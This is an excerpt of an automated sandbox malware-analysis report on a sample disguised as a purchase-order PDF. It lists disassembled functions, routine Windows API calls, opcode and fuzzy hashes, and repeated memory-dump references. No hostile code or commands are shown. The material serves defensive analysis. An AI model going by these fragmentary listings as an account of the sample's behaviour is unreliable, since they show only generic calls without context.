                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                                                                                                                                                                                            • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                                                                                                                                                                                                                                            Function 00448C8B Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32 ref: 00448CB8
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                                                                                                                                                                                                                            Function 004588B0 Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • select.WSOCK32 ref: 0045890A
                                                                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                                                                                                                                                                                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458927
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorLastacceptselect
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 385091864-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                                                                                                                                                                                                                            Function 00438D4E Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                                                                                                                                                                                            • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                                                                                                                                                                                                            Function 0043362D Relevance: 6.1, APIs: 4, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1358664141-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
                                                                                                                                                                                                                                                                                                            Function 0044419B Relevance: 6.1, APIs: 4, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004441B8
                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 004441F6
                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00444213
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                                                                                                                                                                                            • Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
                                                                                                                                                                                                                                                                                                            Function 0043401C Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00434037
                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0043405B
                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00434085
                                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,?,?), ref: 004340A4
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                                                                                                                                                                                                            • Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
                                                                                                                                                                                                                                                                                                            Function 00436A1D Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00436A45
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436A93
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436AB0
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1187119602-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                                                                                                                                                                                                            • Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
                                                                                                                                                                                                                                                                                                            Function 00437AFE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1597257046-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6f5b565237f7f1bf08b1bbdf2bbb2a4a46f338674328461ca353586605d018ca
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f5b565237f7f1bf08b1bbdf2bbb2a4a46f338674328461ca353586605d018ca
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
                                                                                                                                                                                                                                                                                                            Function 004555D6 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: DeleteDestroyObject$IconWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3349847261-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                                                                                                                                                                                                            • Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
                                                                                                                                                                                                                                                                                                            Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B60B
                                                                                                                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B619
                                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B630
                                                                                                                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B641
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
